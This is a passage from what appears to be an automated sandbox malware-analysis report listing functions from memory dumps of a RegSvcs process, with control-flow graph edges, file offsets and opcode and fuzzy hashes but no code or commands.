                                                                                Function 00FD69A0 Relevance: .5, Instructions: 518COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7d7ce4574a05eb77e9e35ffb092c1840385a77e81eafaea26e80d0754d154f67
                                                                                • Instruction ID: a5fb94039b729b2d777b6653243a1312f287259291a5688d34201c59057984a2
                                                                                • Opcode Fuzzy Hash: 7d7ce4574a05eb77e9e35ffb092c1840385a77e81eafaea26e80d0754d154f67
                                                                                • Instruction Fuzzy Hash: 97129070A002199FDB14DF69C854BAEBBF3BF88710F24856AE405EB395EB349D41DB90
                                                                                Function 00FD6FC8 Relevance: .4, Instructions: 449COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3691 fd6fc8-fd6ffe 3822 fd7000 call fd7118 3691->3822 3823 fd7000 call fd6fc8 3691->3823 3824 fd7000 call fd69a0 3691->3824 3692 fd7006-fd700c 3693 fd705c-fd7060 3692->3693 3694 fd700e-fd7012 3692->3694 3695 fd7077-fd708b 3693->3695 3696 fd7062-fd7071 3693->3696 3697 fd7014-fd7019 3694->3697 3698 fd7021-fd7028 3694->3698 3703 fd7093-fd709a 3695->3703 3819 fd708d call fda0e8 3695->3819 3820 fd708d call fda088 3695->3820 3821 fd708d call fd9dd0 3695->3821 3701 fd709d-fd70a7 3696->3701 3702 fd7073-fd7075 3696->3702 3697->3698 3699 fd70fe-fd713b 3698->3699 3700 fd702e-fd7035 3698->3700 3713 fd713d-fd7143 3699->3713 3714 fd7146-fd7166 3699->3714 3700->3693 3704 fd7037-fd703b 3700->3704 3705 fd70a9-fd70af 3701->3705 3706 fd70b1-fd70b5 3701->3706 3702->3703 3707 fd703d-fd7042 3704->3707 3708 fd704a-fd7051 3704->3708 3710 fd70bd-fd70f7 3705->3710 3706->3710 3711 fd70b7 3706->3711 3707->3708 3708->3699 3712 fd7057-fd705a 3708->3712 3710->3699 3711->3710 3712->3703 3713->3714 3720 fd716d-fd7174 3714->3720 3721 fd7168 3714->3721 3722 fd7176-fd7181 3720->3722 3723 fd74fc-fd7505 3721->3723 3724 fd750d-fd753a 3722->3724 3725 fd7187-fd719a 3722->3725 3730 fd719c-fd71aa 3725->3730 3731 fd71b0-fd71cb 3725->3731 3730->3731 3737 fd7484-fd748b 3730->3737 3738 fd71cd-fd71d3 3731->3738 3739 fd71ef-fd71f2 3731->3739 3737->3723 3744 fd748d-fd748f 3737->3744 3742 fd71dc-fd71df 3738->3742 3743 fd71d5 3738->3743 3740 fd734c-fd7352 3739->3740 3741 fd71f8-fd71fb 3739->3741 3745 fd743e-fd7441 3740->3745 3746 fd7358-fd735d 3740->3746 3741->3740 3747 fd7201-fd7207 3741->3747 3748 fd7212-fd7218 3742->3748 3749 fd71e1-fd71e4 3742->3749 3743->3740 3743->3742 3743->3745 3743->3748 3750 fd749e-fd74a4 3744->3750 3751 fd7491-fd7496 3744->3751 3754 fd7508 3745->3754 3755 fd7447-fd744d 3745->3755 3746->3745 3747->3740 3753 fd720d 3747->3753 3756 fd721e-fd7220 3748->3756 3757 fd721a-fd721c 3748->3757 3758 fd727e-fd7284 3749->3758 3759 fd71ea 3749->3759 3750->3724 3752 fd74a6-fd74ab 3750->3752 3751->3750 3760 fd74ad-fd74b2 3752->3760 3761 fd74f0-fd74f3 3752->3761 3753->3745 3754->3724 3763 fd744f-fd7457 3755->3763 3764 fd7472-fd7476 3755->3764 3765 fd722a-fd7233 3756->3765 3757->3765 3758->3745 3762 fd728a-fd7290 3758->3762 3759->3745 3760->3754 3766 fd74b4 3760->3766 3761->3754 3773 fd74f5-fd74fa 3761->3773 3767 fd7296-fd7298 3762->3767 3768 fd7292-fd7294 3762->3768 3763->3724 3769 fd745d-fd746c 3763->3769 3764->3737 3772 fd7478-fd747e 3764->3772 3770 fd7235-fd7240 3765->3770 3771 fd7246-fd726e 3765->3771 3774 fd74bb-fd74c0 3766->3774 3775 fd72a2-fd72b9 3767->3775 3768->3775 3769->3731 3769->3764 3770->3745 3770->3771 3793 fd7274-fd7279 3771->3793 3794 fd7362-fd7398 3771->3794 3772->3722 3772->3737 3773->3723 3773->3744 3776 fd74e2-fd74e4 3774->3776 3777 fd74c2-fd74c4 3774->3777 3787 fd72bb-fd72d4 3775->3787 3788 fd72e4-fd730b 3775->3788 3776->3754 3784 fd74e6-fd74e9 3776->3784 3781 fd74c6-fd74cb 3777->3781 3782 fd74d3-fd74d9 3777->3782 3781->3782 3782->3724 3786 fd74db-fd74e0 3782->3786 3784->3761 3786->3776 3789 fd74b6-fd74b9 3786->3789 3787->3794 3797 fd72da-fd72df 3787->3797 3788->3754 3799 fd7311-fd7314 3788->3799 3789->3754 3789->3774 3793->3794 3800 fd739a-fd739e 3794->3800 3801 fd73a5-fd73ad 3794->3801 3797->3794 3799->3754 3802 fd731a-fd7343 3799->3802 3803 fd73bd-fd73c1 3800->3803 3804 fd73a0-fd73a3 3800->3804 3801->3754 3805 fd73b3-fd73b8 3801->3805 3802->3794 3817 fd7345-fd734a 3802->3817 3806 fd73e0-fd73e4 3803->3806 3807 fd73c3-fd73c9 3803->3807 3804->3801 3804->3803 3805->3745 3810 fd73ee-fd740d call fd76f1 3806->3810 3811 fd73e6-fd73ec 3806->3811 3807->3806 3809 fd73cb-fd73d3 3807->3809 3809->3754 3812 fd73d9-fd73de 3809->3812 3814 fd7413-fd7417 3810->3814 3811->3810 3811->3814 3812->3745 3814->3745 3815 fd7419-fd7435 3814->3815 3815->3745 3817->3794 3819->3703 3820->3703 3821->3703 3822->3692 3823->3692 3824->3692
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7274194d24389c09d38cddbf3c2fd4d5d8050143ac56879d8b36958b276cf03b
                                                                                • Instruction ID: 441f1b5e11d8125009da0c7e4f7a29759d55816875e12c3fda5d718390a30f8b
                                                                                • Opcode Fuzzy Hash: 7274194d24389c09d38cddbf3c2fd4d5d8050143ac56879d8b36958b276cf03b
                                                                                • Instruction Fuzzy Hash: 1B024F31A04215DFCB15EF68D844AAEBBF3BF49310F19846AE805AB361E734ED41EB51
                                                                                Function 061BDE00 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3996 61bde00-61bde20 3997 61bde22 3996->3997 3998 61bde27-61bde7d 3996->3998 3997->3998 4000 61bde87-61bdeb8 3998->4000 4003 61bdebe-61bdf07 call 61b2dc8 call 61b9548 call 61bc588 4000->4003 4004 61be202-61be234 4000->4004 4013 61bdf09 4003->4013 4014 61bdf0e-61bdf17 4003->4014 4013->4014 4015 61be1f5-61be1fb 4014->4015 4016 61bdf1c-61bdf92 call 61bc708 * 3 call 61bcc08 4015->4016 4017 61be201 4015->4017 4026 61bdf98-61be006 4016->4026 4027 61be04e-61be0a8 call 61bc708 4016->4027 4017->4004 4037 61be049-61be04c 4026->4037 4038 61be008-61be048 4026->4038 4039 61be0a9-61be0f7 4027->4039 4037->4039 4038->4037 4044 61be0fd-61be1df 4039->4044 4045 61be1e0-61be1eb 4039->4045 4044->4045 4046 61be1ed 4045->4046 4047 61be1f2 4045->4047 4046->4047 4047->4015
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 57d24643fe23c919ef422208be4fdfbceda9fa4539b327be6c37cef451399449
                                                                                • Instruction ID: 6faf421b343387fc30feb32f569a9983e6d12b627efe37a67f30befba8ac50bc
                                                                                • Opcode Fuzzy Hash: 57d24643fe23c919ef422208be4fdfbceda9fa4539b327be6c37cef451399449
                                                                                • Instruction Fuzzy Hash: 4FC1BD78E00218CFEB54DFA5D994BDDBBB2AF89300F2490A9D409AB355DB359E81CF50
                                                                                Function 061B2968 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3935 61b2968-61b2988 3936 61b298a 3935->3936 3937 61b298f-61b2a20 3935->3937 3936->3937 3941 61b2d72-61b2da4 3937->3941 3942 61b2a26-61b2a36 3937->3942 3990 61b2a39 call 61b2dc8 3942->3990 3991 61b2a39 call 61b310e 3942->3991 3992 61b2a39 call 61b2dc2 3942->3992 3945 61b2a3f-61b2a4e 3993 61b2a50 call 61b9548 3945->3993 3994 61b2a50 call 61b9328 3945->3994 3995 61b2a50 call 61b992c 3945->3995 3946 61b2a56-61b2a72 3948 61b2a79-61b2a82 3946->3948 3949 61b2a74 3946->3949 3950 61b2d65-61b2d6b 3948->3950 3949->3948 3951 61b2d71 3950->3951 3952 61b2a87-61b2b01 3950->3952 3951->3941 3957 61b2bbd-61b2c18 3952->3957 3958 61b2b07-61b2b75 3952->3958 3969 61b2c19-61b2c67 3957->3969 3967 61b2bb8-61b2bbb 3958->3967 3968 61b2b77-61b2bb7 3958->3968 3967->3969 3968->3967 3974 61b2c6d-61b2d4f 3969->3974 3975 61b2d50-61b2d5b 3969->3975 3974->3975 3976 61b2d5d 3975->3976 3977 61b2d62 3975->3977 3976->3977 3977->3950 3990->3945 3991->3945 3992->3945 3993->3946 3994->3946 3995->3946
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 710b2519f7350b789b289082031a648c98cb30b5d293af2b98717ed4b8b49644
                                                                                • Instruction ID: 04282a3dd4a9c75c4096580228587bdd320f97bfdb2947537bb8fdbbc6610146
                                                                                • Opcode Fuzzy Hash: 710b2519f7350b789b289082031a648c98cb30b5d293af2b98717ed4b8b49644
                                                                                • Instruction Fuzzy Hash: C9C1BE78E00218CFEB54DFA5D944BADBBB2FF89300F1480A9D809AB355DB355A85CF10
                                                                                Function 00FDC147 Relevance: .2, Instructions: 229COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 528e4e09215310e52e192d1d870fcff58e68883d40041b719a7a1c121bb44133
                                                                                • Instruction ID: f87982ff0b9e5fb9a5035c5048e1b87dddec11351bc02bdfdb6430611c6853ca
                                                                                • Opcode Fuzzy Hash: 528e4e09215310e52e192d1d870fcff58e68883d40041b719a7a1c121bb44133
                                                                                • Instruction Fuzzy Hash: 84A1F875E00219DFDB14DFA9D884A9DBBF2BF89310F14806AE409EB365DB349941DF50
                                                                                Function 061B1E80 Relevance: .2, Instructions: 220COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bebdf3100e5eacb68f8acf689f7f64719321e7c3a94414fd57f45d338c97b0b9
                                                                                • Instruction ID: 41f110a488318fef0e55ef9474f573483fb1fe85c6dadd6de8911d673d1bd80c
                                                                                • Opcode Fuzzy Hash: bebdf3100e5eacb68f8acf689f7f64719321e7c3a94414fd57f45d338c97b0b9
                                                                                • Instruction Fuzzy Hash: 97A19075E01219CFEB68CF6AC954BDEBAF2AB88300F14D0AAD408A7254DB345A85CF51
                                                                                Function 061B2DC8 Relevance: .2, Instructions: 220COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9593f99914041a71eb04838b90b4b2512044cf753f73839cd31c11d2861fe3ed
                                                                                • Instruction ID: dcaaba92f0559b9acdbb4d31abab93e5c1547d818427fc7feff9c41d0071460b
                                                                                • Opcode Fuzzy Hash: 9593f99914041a71eb04838b90b4b2512044cf753f73839cd31c11d2861fe3ed
                                                                                • Instruction Fuzzy Hash: 75A11470D00208CFEB14DFA9C944BDDBBB1FF88314F249269E418A72A1DB759A85CF55
                                                                                Function 061B17A0 Relevance: .2, Instructions: 219COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1dc92d5f1a8cdfd50450494387b53a31224d2435966ed926614d85da58ed552e
                                                                                • Instruction ID: cbb8c0c0f1cb9535d70a48bb5a8983068fa4a2c9ce8abc00e4ab69f5af484488
                                                                                • Opcode Fuzzy Hash: 1dc92d5f1a8cdfd50450494387b53a31224d2435966ed926614d85da58ed552e
                                                                                • Instruction Fuzzy Hash: 9AA1A075E01229CFEB68CF6AC954BDDBBF2AF88300F14D1A9D408A7254DB345A85CF50
                                                                                Function 061B2DC2 Relevance: .2, Instructions: 218COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 945dda1aac0cbf88c38792bcbacb220f4c6801d7211b6deffca0dde493efac44
                                                                                • Instruction ID: 33050a3b4bc8db9cfe6922e5db9eda753b171cd5a4710ef84925a672998b7f9d
                                                                                • Opcode Fuzzy Hash: 945dda1aac0cbf88c38792bcbacb220f4c6801d7211b6deffca0dde493efac44
                                                                                • Instruction Fuzzy Hash: B2A10470D00208CFEB14DFA9C944BDDBBB1FF89304F249269E409A7291DB759A85CF54
                                                                                Function 061B310E Relevance: .2, Instructions: 202COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5d81117ac76e71ef6658caecd4134b6333d74d36f4b328ae0b043d0ec4eb84c0
                                                                                • Instruction ID: 680f81786164ca5315d5446d98ad16f793c226ca5dbdbf6710cb082d18b4f598
                                                                                • Opcode Fuzzy Hash: 5d81117ac76e71ef6658caecd4134b6333d74d36f4b328ae0b043d0ec4eb84c0
                                                                                • Instruction Fuzzy Hash: A3911370D00208CFEB54DFA8C984BDDBBB1FF49314F2492A9E419AB291DB759A85CF10
                                                                                Function 061BFC68 Relevance: .2, Instructions: 200COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0d0023d80bf4607a4f1bbc04d651252ea628ac0ee6e9764aa246a7954cba2d5b
                                                                                • Instruction ID: 9d58de2d199a600f9e208c8b259445aedd20c3752c424b7f3e409c7ba9478f53
                                                                                • Opcode Fuzzy Hash: 0d0023d80bf4607a4f1bbc04d651252ea628ac0ee6e9764aa246a7954cba2d5b
                                                                                • Instruction Fuzzy Hash: 4281DF74E01218CFEB54EFA9D890AEDBBB2FF89300F248129D815AB358DB355942CF50
                                                                                Function 00FDC468 Relevance: .2, Instructions: 195COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 13f57c9ae94589882f2b667e66d783948db456454e7b3f3ce72a85f2084814cf
                                                                                • Instruction ID: 38364f4c12df89242dba5e95f3246d17da7aed308722f0164d303b6ec00d4f79
                                                                                • Opcode Fuzzy Hash: 13f57c9ae94589882f2b667e66d783948db456454e7b3f3ce72a85f2084814cf
                                                                                • Instruction Fuzzy Hash: CC81D374E00219CFDB14DFAAD984B9DBBF2BF88310F18906AE409AB365DB349941DF50
                                                                                Function 00FD5370 Relevance: .2, Instructions: 191COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cd05b1a7c6640106006596793a1ef2db03900755ed15282686b1889d015d6c21
                                                                                • Instruction ID: ea50e597238f33aac911d3d661d831d36deb1a49f03fc565e20a0eae856d1a5f
                                                                                • Opcode Fuzzy Hash: cd05b1a7c6640106006596793a1ef2db03900755ed15282686b1889d015d6c21
                                                                                • Instruction Fuzzy Hash: 9681D574E00618CFDB14DFAAD944B9DBBF2BF88314F18806AE409AB365DB349941DF50
                                                                                Function 00FDD278 Relevance: .2, Instructions: 190COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b18ee54d96e852ce449ca9eafffdaf1a52d3551a4ba119142311178c0dcc65a7
                                                                                • Instruction ID: d164ed323d31bf78fb395b7e5e32931940ff10321de0acf5b6e4af0d35cd0b51
                                                                                • Opcode Fuzzy Hash: b18ee54d96e852ce449ca9eafffdaf1a52d3551a4ba119142311178c0dcc65a7
                                                                                • Instruction Fuzzy Hash: A081B374E00218CFDB14DFAAD984B9DBBF2BF89310F24806AE409AB365DB349945DF50
                                                                                Function 00FDCA08 Relevance: .2, Instructions: 188COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ea3c40e19d6a1bbdcb4b082e3373133d4992ef3d93a1237e22136183e8dd426f
                                                                                • Instruction ID: 7e30ccf20ef9cc4861569f686209ddc8cedda81ef96d23f202ad1f80eb81a43e
                                                                                • Opcode Fuzzy Hash: ea3c40e19d6a1bbdcb4b082e3373133d4992ef3d93a1237e22136183e8dd426f
                                                                                • Instruction Fuzzy Hash: AD81A274E00219CFDB14DFAAD894B9DBBF2BF88310F24806AE419AB365DB749941DF50
                                                                                Function 00FDCFA9 Relevance: .2, Instructions: 188COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f20e55ad3759be377c7775bc3f2d2149b3bfe189542c6d3453151a1eb38735ca
                                                                                • Instruction ID: aec1391f2049d6d49c95cd443931c53fbe798fd6a17f892caf7d9d3bba0b920e
                                                                                • Opcode Fuzzy Hash: f20e55ad3759be377c7775bc3f2d2149b3bfe189542c6d3453151a1eb38735ca
                                                                                • Instruction Fuzzy Hash: 03819274E00218CFEB14DFAAD984A9DBBF2FF88314F14806AE409AB365DB349945DF50
                                                                                Function 00FDCCD8 Relevance: .2, Instructions: 187COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 74fd19b0c3ad6bc899e68e3c07b8bab195db900fbcab441a464fa7d779cf64cb
                                                                                • Instruction ID: a6e229f4158473f1b7bccc22003ea4905303bf783613b742d4cbfea211cb6d7b
                                                                                • Opcode Fuzzy Hash: 74fd19b0c3ad6bc899e68e3c07b8bab195db900fbcab441a464fa7d779cf64cb
                                                                                • Instruction Fuzzy Hash: 2981C274E00219DFDB14DFAAD884B9DBBF2BF88300F24806AE419AB365DB349941DF50
                                                                                Function 00FDC738 Relevance: .2, Instructions: 186COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 71570ba796630658510d61e2c043d96727040bc8a069c52d6bf5a94d35d8c53c
                                                                                • Instruction ID: 39b678d42f4d8736c169898755b0d35bc9bd892ca845214b47ba7547528ff2c4
                                                                                • Opcode Fuzzy Hash: 71570ba796630658510d61e2c043d96727040bc8a069c52d6bf5a94d35d8c53c
                                                                                • Instruction Fuzzy Hash: 0781B274E00219CFEB14DFAAD994B9DBBF2BF88310F14806AE409AB365DB349941DF50
                                                                                Function 061B0B20 Relevance: .2, Instructions: 174COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8f202af5aece19c3879fcc69c6011a68e46420191dd1fa72cfa725291f8ae079
                                                                                • Instruction ID: ba045de0938a9f23d161609322bd2ce854791b81b0648b4ab2168d00628070ec
                                                                                • Opcode Fuzzy Hash: 8f202af5aece19c3879fcc69c6011a68e46420191dd1fa72cfa725291f8ae079
                                                                                • Instruction Fuzzy Hash: 5A71E275D01228CFDB68DF6AD9807DDBBF2AF89301F1090AAD409A7364DB345A82CF50
                                                                                Function 061B178F Relevance: .2, Instructions: 162COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fbe487f47d244b6c951b4f1718045b501ac331a2a21ed919681d38816622c5be
                                                                                • Instruction ID: ae619d6f734906c24550bbcc82a5bfe63f106be361799e77f67d70c07797693b
                                                                                • Opcode Fuzzy Hash: fbe487f47d244b6c951b4f1718045b501ac331a2a21ed919681d38816622c5be
                                                                                • Instruction Fuzzy Hash: 75719275E016288FEB68CF6AC954BDEBBF2BF88300F14C1A9D408A7254DB745A85CF10
                                                                                Function 00FDE97B Relevance: .1, Instructions: 149COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cc84d9cfcd42910b5ff064865b6ace900fbba9ed0822fb5cafe057d3f27ece59
                                                                                • Instruction ID: e7efc7cfbd6ec1d2275a15d6edb68341876f9b8d008e630fb774539a35eaaf7b
                                                                                • Opcode Fuzzy Hash: cc84d9cfcd42910b5ff064865b6ace900fbba9ed0822fb5cafe057d3f27ece59
                                                                                • Instruction Fuzzy Hash: 7151B774E00209DFDB18DFA6D894A9DBBB2FF89310F24D02AE815AB365DB345841DF54
                                                                                Function 00FDE988 Relevance: .1, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 13f9be0dbbdc128b6dc956a8f293ffac154b8f6151efdc1b3afa4e6b09942109
                                                                                • Instruction ID: 6ee6183cc57c5252514ee9b61d5a0092862bb94e5102f830558d70adc1e67d65
                                                                                • Opcode Fuzzy Hash: 13f9be0dbbdc128b6dc956a8f293ffac154b8f6151efdc1b3afa4e6b09942109
                                                                                • Instruction Fuzzy Hash: E551B774E00209DFDB18DFAAD494A9DBBF2BF89300F24902AE819AB365DB345841DF14
                                                                                Function 061B1E70 Relevance: .1, Instructions: 107COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c96824f5d3d94b278640d341eaece712cdf4f876494ef7dd12deabc6b935bfa5
                                                                                • Instruction ID: 112f3e29e0738cc5479f4ef0836b4f5be89b4e2140b133d86f659bea469edac2
                                                                                • Opcode Fuzzy Hash: c96824f5d3d94b278640d341eaece712cdf4f876494ef7dd12deabc6b935bfa5
                                                                                • Instruction Fuzzy Hash: 81416771E016589BEB58CF6BD9547DEFAF3AFC9200F14C1AAC40CA6254EB740A85CF51
                                                                                Function 061B295A Relevance: .1, Instructions: 99COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0caccb789b2d9badf214842ad2f325dfd14d37918675a6e5fe85750039f50047
